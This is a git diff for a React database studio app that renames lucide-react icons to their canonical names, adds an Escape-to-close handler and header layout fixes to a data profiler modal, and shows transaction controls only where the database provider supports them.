-              <AlertCircle strokeWidth={1.5} className="w-3.5 h-3.5 shrink-0" />
+              <CircleAlert strokeWidth={1.5} className="w-3.5 h-3.5 shrink-0" />
               {error}
             </div>
           )}
@@ -374,7 +374,7 @@ export function DataProfiler({
                   <div className="flex items-center gap-2 mb-2">
                     <Sparkles strokeWidth={1.5} className="w-3.5 h-3.5 text-cyan-400" />
                     <span className="text-xs font-medium text-cyan-400">AI Analysis</span>
-                    {isAiLoading && <Loader2 strokeWidth={1.5} className="w-3 h-3 animate-spin text-cyan-400" />}
+                    {isAiLoading && <LoaderCircle strokeWidth={1.5} className="w-3 h-3 animate-spin text-cyan-400" />}
                   </div>
                   {aiSummary && (
                     <div className="text-xs text-fg-tertiary leading-relaxed whitespace-pre-wrap">{aiSummary}</div>

--- a/src/components/DataProfiler.tsx
+++ b/src/components/DataProfiler.tsx
@@ -75,6 +75,34 @@ export function DataProfiler({
     // eslint-disable-next-line react-hooks/exhaustive-deps
   }, [isOpen, tableName]);
 
+  /*
+    Escape closes the modal.
+
+    U4: `/api/db/profile` can fail for any provider (#427 measured it on Redis,
+    where the route answered 400 for every key-prefix row), and the card that
+    failure renders was a dead end - this shell is hand-rolled rather than a
+    `ui/dialog`, so nothing bound Escape for it and the header control was the only
+    exit. Swapping the shell for the Radix primitive would bring Escape along, but
+    it also portals the card out of the subtree `[data-studio-workspace]` styles by
+    descendant selector, and re-homing the embedded surface's chrome is a larger
+    change than a dismiss fix should make.
+
+    Registered on `document`, following CommandPalette's shortcut effect
+    (src/components/CommandPalette.tsx:79): the card takes no focus of its own when
+    it opens, so a handler on the card would never see the key. Bound only while
+    open, so a closed profiler - of which the tree holds one per surface - is not a
+    listener that swallows Escape from whatever else is on screen.
+  */
+  useEffect(() => {
+    if (!isOpen) return;
+    const handleKeyDown = (event: KeyboardEvent) => {
+      if (event.key !== "Escape") return;
+      onClose();
+    };
+    document.addEventListener("keydown", handleKeyDown);
+    return () => document.removeEventListener("keydown", handleKeyDown);
+  }, [isOpen, onClose]);
+
   const fetchProfile = async () => {
     if (!connection || !tableSchema) return;
     setIsLoading(true);
@@ -171,13 +199,24 @@ export function DataProfiler({
     <div className="fixed inset-0 z-50 flex items-center justify-center bg-black/60 backdrop-blur-sm">
       <div className="bg-overlay border border-hairline-strong rounded-xl shadow-2xl w-full max-w-2xl mx-4 max-h-[85vh] flex flex-col overflow-hidden">
         {/* Header */}
-        <div className="flex items-center justify-between px-5 py-3 border-b border-hairline">
-          <div className="flex items-center gap-2">
-            <BarChart3 strokeWidth={1.5} className="w-3.5 h-3.5 text-cyan-400" />
-            <span className="text-xs font-medium text-fg">Data Profiler</span>
-            <span className="text-xs text-fg-muted font-mono">{tableName}</span>
+        {/*
+          `shrink-0` and `relative z-10`, and the title row `min-w-0` with the table
+          name truncating: the card is `overflow-hidden`, so a header that shrinks or
+          overflows takes its close control out of reach along with it - and the names
+          that overflow it are exactly the ones the profile route fails on (a Redis key
+          prefix is a whole glob, not an identifier).
+        */}
+        <div className="relative z-10 shrink-0 flex items-center justify-between gap-2 px-5 py-3 border-b border-hairline">
+          <div className="flex min-w-0 items-center gap-2">
+            <BarChart3 strokeWidth={1.5} className="w-3.5 h-3.5 shrink-0 text-cyan-400" />
+            <span className="text-xs font-medium text-fg shrink-0">Data Profiler</span>
+            <span className="text-xs text-fg-muted font-mono truncate">{tableName}</span>
           </div>
-          <button onClick={onClose} className="p-1 rounded hover:bg-fill text-fg-muted">
+          <button
+            onClick={onClose}
+            aria-label="Close data profiler"
+            className="shrink-0 p-1 rounded hover:bg-fill text-fg-muted"
+          >
             <X strokeWidth={1.5} className="w-3.5 h-3.5" />
           </button>
         </div>

--- a/src/components/DatabaseDocs.tsx
+++ b/src/components/DatabaseDocs.tsx
@@ -1,7 +1,7 @@
 "use client";
 
 import React, { useState } from "react";
-import { FileText, Loader2, Search, Sparkles, Download } from "lucide-react";
+import { FileText, LoaderCircle, Search, Sparkles, Download } from "lucide-react";
 import { cn } from "@/lib/utils";
 import { TableSchema } from "@/lib/types";
 import { renderInline } from "@/components/rich-text";
@@ -177,7 +177,7 @@ export function DatabaseDocs({ schema, schemaContext, databaseType }: DatabaseDo
               isAiLoading ? "bg-teal-600/20 text-teal-400 cursor-wait" : "bg-teal-600 hover:bg-teal-500 text-white",
             )}
           >
-            {isAiLoading && <Loader2 strokeWidth={1.5} className="w-3 h-3 animate-spin" />}
+            {isAiLoading && <LoaderCircle strokeWidth={1.5} className="w-3 h-3 animate-spin" />}
             {!isAiLoading && <Sparkles strokeWidth={1.5} className="w-3 h-3" />}
             {aiDocs ? "Regenerate" : "AI Describe"}
           </button>
@@ -212,7 +212,7 @@ export function DatabaseDocs({ schema, schemaContext, databaseType }: DatabaseDo
             <div className="flex items-center gap-2 mb-3">
               <Sparkles strokeWidth={1.5} className="w-3 h-3 text-teal-400" />
               <span className="text-xs font-medium text-teal-400">AI-Generated Documentation</span>
-              {isAiLoading && <Loader2 strokeWidth={1.5} className="w-3 h-3 animate-spin text-teal-400" />}
+              {isAiLoading && <LoaderCircle strokeWidth={1.5} className="w-3 h-3 animate-spin text-teal-400" />}
             </div>
             {aiDocs && <div className="prose prose-invert prose-xs max-w-none">{renderMarkdown(aiDocs)}</div>}
           </div>

--- a/src/components/LazyView.tsx
+++ b/src/components/LazyView.tsx
@@ -15,9 +15,10 @@ import { cn } from "@/lib/utils";
  * either unsaid is how a click on Charts becomes a spinner that never stops, or —
  * with no fallback at all — a click that does nothing.
  *
- * `LoaderCircle`, not `Loader2`: on lucide-react 1.x the latter is a legacy-rename
- * alias that ships no `@deprecated` tag, so nothing warns while it is alive and the
- * first signal is a build breaking on the release that drops it (docs/BACKLOG.md P6).
+ * `LoaderCircle`, not `Loader2`, and the same everywhere: on lucide-react 1.x the
+ * old spellings are legacy-rename aliases that ship no `@deprecated` tag, so nothing
+ * warns while one is alive and the first signal is a build breaking on the release
+ * that drops it. Every icon import in this repo uses its canonical v1 name.
  */
 export function ViewLoading({ label, className }: { label: string; className?: string }) {
   return (

--- a/src/components/QueryEditor.tsx
+++ b/src/components/QueryEditor.tsx
@@ -3,7 +3,7 @@
 import React, { useRef, useEffect, useState, useMemo, forwardRef, useImperativeHandle } from "react";
 import Editor, { useMonaco } from "@monaco-editor/react";
 import type * as Monaco from "monaco-editor";
-import { Zap, Loader2, AlignLeft, Trash2, Copy, Play, Hash } from "lucide-react";
+import { Zap, LoaderCircle, TextAlignStart, Trash2, Copy, Play, Hash } from "lucide-react";
 import { cn } from "@/lib/utils";
 import { Button } from "@/components/ui/button";
 import { format } from "sql-formatter";
@@ -553,7 +553,7 @@ export const QueryEditor = forwardRef<QueryEditorRef, QueryEditorProps>(
               onClick={handleFormat}
               title={language === "json" ? "Format JSON (Shift+Alt+F)" : "Format SQL (Shift+Alt+F)"}
             >
-              <AlignLeft strokeWidth={1.5} className="w-3 h-3" /> Format
+              <TextAlignStart strokeWidth={1.5} className="w-3 h-3" /> Format
             </Button>
           )}
 
@@ -620,7 +620,7 @@ export const QueryEditor = forwardRef<QueryEditorRef, QueryEditorProps>(
             onChange={handleEditorChange}
             loading={
               <div className="h-full w-full bg-canvas flex items-center justify-center">
-                <Loader2 strokeWidth={1.5} className="w-6 h-6 animate-spin text-fg-subtle" />
+                <LoaderCircle strokeWidth={1.5} className="w-6 h-6 animate-spin text-fg-subtle" />
               </div>
             }
             onMount={(editor, monaco) => {

--- a/src/components/QueryHistory.tsx
+++ b/src/components/QueryHistory.tsx
@@ -6,8 +6,8 @@ import { QueryHistoryItem } from "@/lib/types";
 import { csvRow } from "@/lib/export/csv";
 import { downloadText } from "@/lib/export/download";
 import {
-  CheckCircle2,
-  AlertCircle,
+  CircleCheck,
+  CircleAlert,
   RotateCcw,
   Trash2,
   Search,
@@ -15,7 +15,7 @@ import {
   ArrowUpDown,
   Hash,
   Database,
-  History as HistoryIcon,
+  RotateCcwClock as HistoryIcon,
   X,
 } from "lucide-react";
 import { Button } from "./ui/button";
@@ -310,12 +310,12 @@ export function QueryHistory({ onSelectQuery, activeConnectionId, refreshTrigger
                       <div className="flex justify-center">
                         {item.status === "success" && (
                           <div className="w-5 h-5 rounded-full bg-emerald-500/10 flex items-center justify-center border border-emerald-500/20">
-                            <CheckCircle2 strokeWidth={1.5} className="w-3 h-3 text-emerald-500" />
+                            <CircleCheck strokeWidth={1.5} className="w-3 h-3 text-emerald-500" />
                           </div>
                         )}
                         {item.status !== "success" && (
                           <div className="w-5 h-5 rounded-full bg-red-500/10 flex items-center justify-center border border-red-500/20">
-                            <AlertCircle strokeWidth={1.5} className="w-3 h-3 text-red-500" />
+                            <CircleAlert strokeWidth={1.5} className="w-3 h-3 text-red-500" />
                           </div>
                         )}
                       </div>

--- a/src/components/QuerySafetyDialog.tsx
+++ b/src/components/QuerySafetyDialog.tsx
@@ -1,7 +1,7 @@
 "use client";
 
 import React, { useState, useEffect, useMemo } from "react";
-import { ShieldAlert, ShieldCheck, AlertTriangle, Loader2, Play, X } from "lucide-react";
+import { ShieldAlert, ShieldCheck, TriangleAlert, LoaderCircle, Play, X } from "lucide-react";
 import { cn } from "@/lib/utils";
 import { readsSqlText, resolveSqlGrammar } from "@/lib/sql/grammar";
 import { readOperativeKeyword } from "@/lib/sql/operative-keyword";
@@ -66,7 +66,7 @@ const RISK_CONFIG = {
     color: "text-amber-400",
     bg: "bg-amber-500/10",
     border: "border-amber-500/20",
-    icon: AlertTriangle,
+    icon: TriangleAlert,
     label: "Medium Risk",
   },
   high: {
@@ -230,7 +230,7 @@ export function QuerySafetyDialog({
           */}
           {unreadableRun && (
             <div className="mb-3 flex items-start gap-2 px-3 py-2 rounded-lg bg-amber-500/10 border border-amber-500/20">
-              <AlertTriangle strokeWidth={1.5} className="w-3.5 h-3.5 mt-0.5 shrink-0 text-amber-400" />
+              <TriangleAlert strokeWidth={1.5} className="w-3.5 h-3.5 mt-0.5 shrink-0 text-amber-400" />
               <div>
                 <span className="text-xs font-medium text-amber-400">Part of this statement could not be read</span>
                 <p className="text-xs text-fg-tertiary mt-0.5">
@@ -244,7 +244,7 @@ export function QuerySafetyDialog({
 
           {isAnalyzing && (
             <div className="flex items-center justify-center gap-2 py-8 text-fg-muted">
-              <Loader2 strokeWidth={1.5} className="w-5 h-5 animate-spin" />
+              <LoaderCircle strokeWidth={1.5} className="w-5 h-5 animate-spin" />
               <span className="text-xs">Analyzing query safety...</span>
             </div>
           )}

--- a/src/components/ResultsGrid.tsx
+++ b/src/components/ResultsGrid.tsx
@@ -16,7 +16,7 @@ import {
 } from "@tanstack/react-table";
 import { useVirtualizer } from "@tanstack/react-virtual";
 import { cn } from "@/lib/utils";
-import { ArrowUpDown, ArrowUp, ArrowDown, Eye, Filter, Lock } from "lucide-react";
+import { ArrowUpDown, ArrowUp, ArrowDown, Eye, Funnel, Lock } from "lucide-react";
 import {
   type MaskingConfig,
   detectSensitiveColumnsFromConfig,
@@ -279,7 +279,7 @@ export function ResultsGrid({
               }}
               title="Filter column"
             >
-              <Filter strokeWidth={1.5} className="w-3 h-3" />
+              <Funnel strokeWidth={1.5} className="w-3 h-3" />
             </button>
             {activeFilterCol === field && (
               <div

--- a/src/components/SavedQueries.tsx
+++ b/src/components/SavedQueries.tsx
@@ -3,7 +3,7 @@
 import React, { useState, useEffect } from "react";
 import { storage } from "@/lib/storage";
 import { SavedQuery } from "@/lib/types";
-import { Bookmark, Search, Trash2, Edit3, Tag, Calendar } from "lucide-react";
+import { Bookmark, Search, Trash2, PenLine, Tag, Calendar } from "lucide-react";
 import { Button } from "./ui/button";
 import { Input } from "./ui/input";
 import { format } from "date-fns";
@@ -93,7 +93,7 @@ export function SavedQueries({ onSelectQuery, connectionType, refreshTrigger }: 
                       className="h-6 w-6 text-fg-muted hover:text-fg-bright"
                       onClick={() => onSelectQuery(q.query)}
                     >
-                      <Edit3 strokeWidth={1.5} className="w-3 h-3" />
+                      <PenLine strokeWidth={1.5} className="w-3 h-3" />
                     </Button>
                     <Button
                       variant="ghost"

--- a/src/components/SchemaDiagram.tsx
+++ b/src/components/SchemaDiagram.tsx
@@ -18,7 +18,7 @@ import {
 } from "@xyflow/react";
 import "@xyflow/react/dist/style.css";
 import { TableSchema } from "@/lib/types";
-import { Download, Info, Loader2, Search, X } from "lucide-react";
+import { Download, Info, LoaderCircle, Search, X } from "lucide-react";
 import { Button } from "@/components/ui/button";
 import { motion } from "framer-motion";
 import { useToast } from "@/hooks/use-toast";
@@ -321,7 +321,7 @@ function SchemaDiagramInner({ schema, onClose }: SchemaDiagramProps) {
   if (schema.length === 0) {
     return (
       <div className="absolute inset-0 z-50 bg-canvas flex flex-col items-center justify-center">
-        <Loader2 strokeWidth={1.5} className="w-8 h-8 text-blue-500 animate-spin mb-4" />
+        <LoaderCircle strokeWidth={1.5} className="w-8 h-8 text-blue-500 animate-spin mb-4" />
         <p className="text-fg-muted text-xs">Generating ERD Diagram...</p>
       </div>
     );
@@ -380,7 +380,7 @@ function SchemaDiagramInner({ schema, onClose }: SchemaDiagramProps) {
                   onClick={() => exportDiagram("png")}
                 >
                   {exporting === "png" ? (
-                    <Loader2 strokeWidth={1.5} className="w-3 h-3 animate-spin" />
+                    <LoaderCircle strokeWidth={1.5} className="w-3 h-3 animate-spin" />
                   ) : (
                     <Download strokeWidth={1.5} className="w-3 h-3" />
                   )}{" "}
@@ -394,7 +394,7 @@ function SchemaDiagramInner({ schema, onClose }: SchemaDiagramProps) {
                   onClick={() => exportDiagram("svg")}
                 >
                   {exporting === "svg" ? (
-                    <Loader2 strokeWidth={1.5} className="w-3 h-3 animate-spin" />
+                    <LoaderCircle strokeWidth={1.5} className="w-3 h-3 animate-spin" />
                   ) : (
                     <Download strokeWidth={1.5} className="w-3 h-3" />
                   )}{" "}
@@ -431,7 +431,7 @@ function SchemaDiagramInner({ schema, onClose }: SchemaDiagramProps) {
                   <span>{graph.edgeCount} relationships</span>
                   {isLayouting && (
                     <span className="flex items-center gap-1 text-fg-subtle">
-                      <Loader2 strokeWidth={1.5} className="w-3 h-3 animate-spin" />
+                      <LoaderCircle strokeWidth={1.5} className="w-3 h-3 animate-spin" />
                       layout
                     </span>
                   )}
@@ -477,7 +477,7 @@ function SchemaDiagramInner({ schema, onClose }: SchemaDiagramProps) {
               transform is temporarily swapped for the fit-all capture. */}
           {exporting && (
             <div className="absolute inset-0 z-50 bg-canvas/85 flex flex-col items-center justify-center gap-2">
-              <Loader2 strokeWidth={1.5} className="w-6 h-6 text-blue-500 animate-spin" />
+              <LoaderCircle strokeWidth={1.5} className="w-6 h-6 text-blue-500 animate-spin" />
               <p className="text-fg-muted text-xs">Exporting {exporting.toUpperCase()}...</p>
             </div>
           )}

--- a/src/components/SchemaDiff.tsx
+++ b/src/components/SchemaDiff.tsx
@@ -5,14 +5,14 @@ import {
   GitCompare,
   Plus,
   Minus,
-  Edit3,
+  PenLine,
   Camera,
   FileCode,
   ChevronRight,
   ChevronDown,
   Clock,
   Database,
-  AlertTriangle,
+  TriangleAlert,
 } from "lucide-react";
 import { Button } from "@/components/ui/button";
 import { Select, SelectContent, SelectItem, SelectTrigger, SelectValue } from "@/components/ui/select";
@@ -156,7 +156,7 @@ export function SchemaDiff({ schema, connection }: SchemaDiffProps) {
       case "modified":
         return (
           <Badge className="bg-yellow-500/20 text-yellow-400 border-yellow-500/30 text-xs">
-            <Edit3 strokeWidth={1.5} className="w-2.5 h-2.5 mr-0.5" />
+            <PenLine strokeWidth={1.5} className="w-2.5 h-2.5 mr-0.5" />
             {"Modified"}
           </Badge>
         );
@@ -246,7 +246,7 @@ export function SchemaDiff({ schema, connection }: SchemaDiffProps) {
                         <div className="flex items-center gap-1">
                           <Database strokeWidth={1.5} className="w-3 h-3 text-blue-400" /> {c.name}
                           {c.environment === "production" && (
-                            <AlertTriangle strokeWidth={1.5} className="w-3 h-3 text-red-400" />
+                            <TriangleAlert strokeWidth={1.5} className="w-3 h-3 text-red-400" />
                           )}
                         </div>
                       </SelectItem>
@@ -382,7 +382,7 @@ export function SchemaDiff({ schema, connection }: SchemaDiffProps) {
           </div>
         ) : (
           <div className="flex-1 flex items-center justify-center text-fg-subtle gap-2">
-            <AlertTriangle strokeWidth={1.5} className="w-3.5 h-3.5" />
+            <TriangleAlert strokeWidth={1.5} className="w-3.5 h-3.5" />
             <span className="text-xs">Cannot compare same schema with itself</span>
           </div>
         )}
@@ -519,7 +519,7 @@ function getActionIcon(action: string) {
     case "removed":
       return <Minus className="w-3 h-3 text-red-400" />;
     case "modified":
-      return <Edit3 strokeWidth={1.5} className="w-3 h-3 text-yellow-400" />;
+      return <PenLine strokeWidth={1.5} className="w-3 h-3 text-yellow-400" />;
     default:
       return null;
   }

--- a/src/components/Studio.tsx
+++ b/src/components/Studio.tsx
@@ -55,7 +55,7 @@ import {
 } from "@/lib/data-masking";
 import { useRouter } from "next/navigation";
 import { cn } from "@/lib/utils";
-import { AlertTriangle, Database, Plus } from "lucide-react";
+import { TriangleAlert, Database, Plus } from "lucide-react";
 import { ResizablePanelGroup, ResizablePanel, ResizableHandle } from "@/components/ui/resizable";
 import { AnimatePresence } from "framer-motion";
 import { Button } from "@/components/ui/button";
@@ -786,7 +786,7 @@ export default function Studio() {
           <div className="px-6 pt-6 pb-4">
             <div className="flex items-start gap-3">
               <div className="w-10 h-10 rounded-xl bg-gradient-to-br from-amber-500/20 to-red-500/10 flex items-center justify-center shrink-0">
-                <AlertTriangle strokeWidth={1.5} className="w-5 h-5 text-amber-400" />
+                <TriangleAlert strokeWidth={1.5} className="w-5 h-5 text-amber-400" />
               </div>
               <div className="flex-1 min-w-0">
                 <AlertDialogTitle className="text-[0.8125rem] font-medium text-fg mb-1">

--- a/src/components/Studio.tsx
+++ b/src/components/Studio.tsx
@@ -141,6 +141,28 @@ export default function Studio() {
       }
     : undefined;
 
+  // The transaction trio and the sandbox toggle are offered only where the provider
+  // declares it holds a transaction session (#U13). The server's gate is
+  // `isTransactionProvider(provider)` — a runtime shape check no client can read — so
+  // both shells used to supply all four unconditionally and POST /api/db/transaction
+  // answered 400 "Transaction control is not supported for this database type"
+  // (measured 2026-08-19 on OpenSearch, for both begin and rollback). Unknown hides
+  // them, like the row-edit gate above: metadata is also null when
+  // /api/db/provider-meta fails.
+  //
+  // Supplied as one bundle because SANDBOX auto-rolls-back through the same route,
+  // and because QueryToolbar's contract is that the three arrive together or not at
+  // all.
+  const canRunTransactions = metadata?.capabilities.supportsTransactions === true;
+  const transactionHandlers = canRunTransactions
+    ? {
+        onBeginTransaction: () => txn.handleTransaction("begin"),
+        onCommitTransaction: () => txn.handleTransaction("commit"),
+        onRollbackTransaction: () => txn.handleTransaction("rollback"),
+        onTogglePlayground: () => txn.setPlaygroundMode(!txn.playgroundMode),
+      }
+    : {};
+
   // === Cross-hook orchestration: connection-change effect ===
   useEffect(() => {
     if (conn.activeConnection) {
@@ -428,10 +450,7 @@ export default function Studio() {
               onClearQuery={() => tabMgr.updateCurrentTab({ query: "" })}
               onExecuteQuery={() => queryExec.executeQuery()}
               onCancelQuery={() => queryExec.cancelQuery()}
-              onBeginTransaction={() => txn.handleTransaction("begin")}
-              onCommitTransaction={() => txn.handleTransaction("commit")}
-              onRollbackTransaction={() => txn.handleTransaction("rollback")}
-              onTogglePlayground={() => txn.setPlaygroundMode(!txn.playgroundMode)}
+              {...transactionHandlers}
               onToggleEditing={onToggleEditing}
               onImport={() => setIsImportModalOpen(true)}
               onExplain={
@@ -560,10 +579,7 @@ export default function Studio() {
                           onSaveQuery={() => setIsSaveQueryModalOpen(true)}
                           onExecuteQuery={() => queryExec.executeQuery()}
                           onCancelQuery={() => queryExec.cancelQuery()}
-                          onBeginTransaction={() => txn.handleTransaction("begin")}
-                          onCommitTransaction={() => txn.handleTransaction("commit")}
-                          onRollbackTransaction={() => txn.handleTransaction("rollback")}
-                          onTogglePlayground={() => txn.setPlaygroundMode(!txn.playgroundMode)}
+                          {...transactionHandlers}
                           onToggleEditing={onToggleEditing}
                           onImport={() => setIsImportModalOpen(true)}
                         />

--- a/src/components/TestDataGenerator.tsx
+++ b/src/components/TestDataGenerator.tsx
@@ -1,7 +1,7 @@
 "use client";
 
 import React, { useState, useMemo } from "react";
-import { Wand2, X, Play, RefreshCw } from "lucide-react";
+import { WandSparkles, X, Play, RefreshCw } from "lucide-react";
 import { cn } from "@/lib/utils";
 import { CopyButton } from "@/components/copy-button";
 import { DatabaseType, TableSchema } from "@/lib/types";
@@ -241,7 +241,7 @@ export function TestDataGenerator({
         {/* Header */}
         <div className="flex items-center justify-between px-5 py-3 border-b border-hairline">
           <div className="flex items-center gap-2">
-            <Wand2 strokeWidth={1.5} className="w-3.5 h-3.5 text-amber-400" />
+            <WandSparkles strokeWidth={1.5} className="w-3.5 h-3.5 text-amber-400" />
             <span className="text-xs font-medium text-fg">Test Data Generator</span>
             <span className="text-xs text-fg-muted font-mono">{tableName}</span>
           </div>

--- a/src/components/VisualExplain.tsx
+++ b/src/components/VisualExplain.tsx
@@ -9,18 +9,18 @@ import {
   Database,
   Clock,
   LayoutGrid,
-  AlertTriangle,
-  CheckCircle2,
+  TriangleAlert,
+  CircleCheck,
   TrendingUp,
   HardDrive,
   Target,
   ChevronRight,
   Info,
-  FileJson,
+  FileBraces,
   Activity,
   Sparkles,
   Play,
-  Loader2,
+  LoaderCircle,
   ListTree,
 } from "lucide-react";
 import { cn } from "@/lib/utils";
@@ -678,7 +678,7 @@ function AIExplainTab({
           className="flex items-center gap-1.5 px-2 py-1 rounded-md text-xs font-medium text-fg-tertiary hover:text-fg-bright hover:bg-fill transition-all"
         >
           {isLoading ? (
-            <Loader2 strokeWidth={1.5} className="w-3 h-3 animate-spin" />
+            <LoaderCircle strokeWidth={1.5} className="w-3 h-3 animate-spin" />
           ) : (
             <Sparkles strokeWidth={1.5} className="w-3 h-3" />
           )}
@@ -690,7 +690,7 @@ function AIExplainTab({
       <div className="flex-1 overflow-auto p-4">
         {error && (
           <div className="flex items-center gap-2 p-3 rounded-lg bg-red-500/5 border border-red-500/10 text-red-400 text-xs mb-4">
-            <AlertTriangle strokeWidth={1.5} className="w-3.5 h-3.5 shrink-0" />
+            <TriangleAlert strokeWidth={1.5} className="w-3.5 h-3.5 shrink-0" />
             {error}
           </div>
         )}
@@ -699,14 +699,14 @@ function AIExplainTab({
 
         {isLoading && !aiResponse && (
           <div className="flex items-center gap-3 text-fg-muted text-xs">
-            <Loader2 strokeWidth={1.5} className="w-3.5 h-3.5 animate-spin text-purple-400" />
+            <LoaderCircle strokeWidth={1.5} className="w-3.5 h-3.5 animate-spin text-purple-400" />
             <span>Analyzing execution plan...</span>
           </div>
         )}
 
         {isLoading && aiResponse && (
           <div className="flex items-center gap-2 mt-2 text-fg-subtle text-xs">
-            <Loader2 strokeWidth={1.5} className="w-3 h-3 animate-spin" />
+            <LoaderCircle strokeWidth={1.5} className="w-3 h-3 animate-spin" />
             <span>Still generating...</span>
           </div>
         )}
@@ -830,7 +830,7 @@ export function VisualExplain({ plan, query, schemaContext, databaseType, onLoad
                 {tab === "insights" && <Zap strokeWidth={1.5} className="w-3 h-3 inline mr-1" />}
                 {tab === "ai" && <Sparkles strokeWidth={1.5} className="w-3 h-3 inline mr-1" />}
                 {tab === "tree" && <Layers strokeWidth={1.5} className="w-3 h-3 inline mr-1" />}
-                {tab === "raw" && <FileJson strokeWidth={1.5} className="w-3 h-3 inline mr-1" />}
+                {tab === "raw" && <FileBraces strokeWidth={1.5} className="w-3 h-3 inline mr-1" />}
                 {tab === "ai" ? "AI Explain" : tab}
               </button>
             ))}
@@ -879,9 +879,9 @@ export function VisualExplain({ plan, query, schemaContext, databaseType, onLoad
                       )}
                     >
                       {warning.type === "critical" ? (
-                        <AlertTriangle strokeWidth={1.5} className="w-3 h-3 text-red-400" />
+                        <TriangleAlert strokeWidth={1.5} className="w-3 h-3 text-red-400" />
                       ) : warning.type === "warning" ? (
-                        <AlertTriangle strokeWidth={1.5} className="w-3 h-3 text-amber-400" />
+                        <TriangleAlert strokeWidth={1.5} className="w-3 h-3 text-amber-400" />
                       ) : (
                         <Info strokeWidth={1.5} className="w-3 h-3 text-blue-400" />
                       )}
@@ -910,7 +910,7 @@ export function VisualExplain({ plan, query, schemaContext, databaseType, onLoad
             {analysis && analysis.warnings.length === 0 && (
               <div className="flex items-center gap-3 p-3 rounded-lg bg-emerald-500/5 border border-emerald-500/10">
                 <div className="p-1 rounded bg-emerald-500/10">
-                  <CheckCircle2 strokeWidth={1.5} className="w-3 h-3 text-emerald-400" />
+                  <CircleCheck strokeWidth={1.5} className="w-3 h-3 text-emerald-400" />
                 </div>
                 <div>
                   <h4 className="text-xs font-medium text-emerald-300">Query looks good</h4>

--- a/src/components/admin/tabs/AuditTab.tsx
+++ b/src/components/admin/tabs/AuditTab.tsx
@@ -12,9 +12,9 @@ import { Table, TableBody, TableCell, TableHead, TableHeader, TableRow } from "@
 import {
   Wrench,
   Search as SearchIcon,
-  BarChart3,
-  CheckCircle2,
-  XCircle,
+  ChartColumn,
+  CircleCheck,
+  CircleX,
   RefreshCw,
   Clock,
   Activity,
@@ -50,7 +50,7 @@ export function AuditTab() {
             value="stats"
             className="gap-2 rounded-none border-b-2 border-transparent data-[state=active]:border-blue-400 data-[state=active]:bg-transparent data-[state=active]:text-blue-400 text-fg-muted text-xs px-4"
           >
-            <BarChart3 className="h-3.5 w-3.5" />
+            <ChartColumn className="h-3.5 w-3.5" />
             Stats
           </TabsTrigger>
         </TabsList>
@@ -191,9 +191,9 @@ function OperationsAudit() {
                 <TableRow key={event.id} className="border-hairline hover:bg-fill">
                   <TableCell className="py-2">
                     {event.result === "success" ? (
-                      <CheckCircle2 className="w-3.5 h-3.5 text-emerald-500" />
+                      <CircleCheck className="w-3.5 h-3.5 text-emerald-500" />
                     ) : (
-                      <XCircle className="w-3.5 h-3.5 text-red-500" />
+                      <CircleX className="w-3.5 h-3.5 text-red-500" />
                     )}
                   </TableCell>
                   <TableCell className="py-2 font-mono text-xs text-fg-muted">
@@ -310,9 +310,9 @@ function QueryAudit() {
                 <TableRow key={idx} className="border-hairline hover:bg-fill">
                   <TableCell className="py-2">
                     {item.status === "success" ? (
-                      <CheckCircle2 className="w-3.5 h-3.5 text-emerald-500" />
+                      <CircleCheck className="w-3.5 h-3.5 text-emerald-500" />
                     ) : (
-                      <XCircle className="w-3.5 h-3.5 text-red-500" />
+                      <CircleX className="w-3.5 h-3.5 text-red-500" />
                     )}
                   </TableCell>
                   <TableCell className="py-2 font-mono text-xs text-fg-muted whitespace-nowrap">

--- a/src/components/admin/tabs/OperationsTab.tsx
+++ b/src/components/admin/tabs/OperationsTab.tsx
@@ -28,9 +28,9 @@ import {
   Skull,
   Database,
   ShieldAlert,
-  Loader2,
-  CheckCircle2,
-  XCircle,
+  LoaderCircle,
+  CircleCheck,
+  CircleX,
   Table2,
 } from "lucide-react";
 import { useSearchParams } from "next/navigation";
@@ -435,7 +435,7 @@ export function OperationsTab() {
                             disabled={!!actionLoading}
                           >
                             {actionLoading === `analyze-${table.tableName}` ? (
-                              <Loader2 className="w-3 h-3 animate-spin" />
+                              <LoaderCircle className="w-3 h-3 animate-spin" />
                             ) : (
                               <Search className="w-3 h-3" />
                             )}
@@ -451,7 +451,7 @@ export function OperationsTab() {
                             disabled={!!actionLoading}
                           >
                             {actionLoading === `vacuum-${table.tableName}` ? (
-                              <Loader2 className="w-3 h-3 animate-spin" />
+                              <LoaderCircle className="w-3 h-3 animate-spin" />
                             ) : (
                               <HardDrive className="w-3 h-3" />
                             )}
@@ -562,7 +562,7 @@ export function OperationsTab() {
                           disabled={killingPid === session.pid}
                         >
                           {killingPid === session.pid ? (
-                            <Loader2 className="h-3 w-3 animate-spin" />
+                            <LoaderCircle className="h-3 w-3 animate-spin" />
                           ) : (
                             <Skull className="h-3 w-3" />
                           )}
@@ -602,9 +602,9 @@ export function OperationsTab() {
                 <span className="text-fg-tertiary font-mono truncate">{entry.target}</span>
                 <div className="ml-auto flex items-center gap-2 shrink-0">
                   {entry.result === "success" ? (
-                    <CheckCircle2 className="w-3 h-3 text-emerald-500" />
+                    <CircleCheck className="w-3 h-3 text-emerald-500" />
                   ) : (
-                    <XCircle className="w-3 h-3 text-red-500" />
+                    <CircleX className="w-3 h-3 text-red-500" />
                   )}
                   <span className="text-fg-subtle font-mono text-xs">{entry.duration}ms</span>
                 </div>

--- a/src/components/admin/tabs/OperationsTab.tsx
+++ b/src/components/admin/tabs/OperationsTab.tsx
@@ -329,8 +329,9 @@ export function OperationsTab() {
               </div>
             )}
 
-            {/* Reindex — ProviderLabels declares no reindexGlobal triad, so this
-                card stays generic; adding one is out of scope for #427. */}
+            {/* Reindex — the triad is OPTIONAL on ProviderLabels (only the three
+                providers that declare the `reindex` operation set it), so the
+                hardcoded strings below stay as the fallback (#U6). */}
             {canRun("reindex") && (
               <div className="p-4 rounded-xl border border-hairline bg-fill-subtle hover:bg-fill transition-colors">
                 <div className="flex items-start justify-between mb-3">
@@ -345,11 +346,13 @@ export function OperationsTab() {
                     disabled={!!actionLoading || !selectedConnection}
                   >
                     {actionLoading === "reindex-global" ? <RefreshCw className="w-3 h-3 animate-spin mr-1" /> : null}
-                    Run Reindex
+                    {labels?.reindexGlobalLabel ?? "Run Reindex"}
                   </Button>
                 </div>
-                <h4 className="text-sm font-bold text-fg mb-1">Rebuild Indexes</h4>
-                <p className="text-xs text-fg-muted leading-relaxed">Reconstructs all indexes in the database.</p>
+                <h4 className="text-sm font-bold text-fg mb-1">{labels?.reindexGlobalTitle ?? "Rebuild Indexes"}</h4>
+                <p className="text-xs text-fg-muted leading-relaxed">
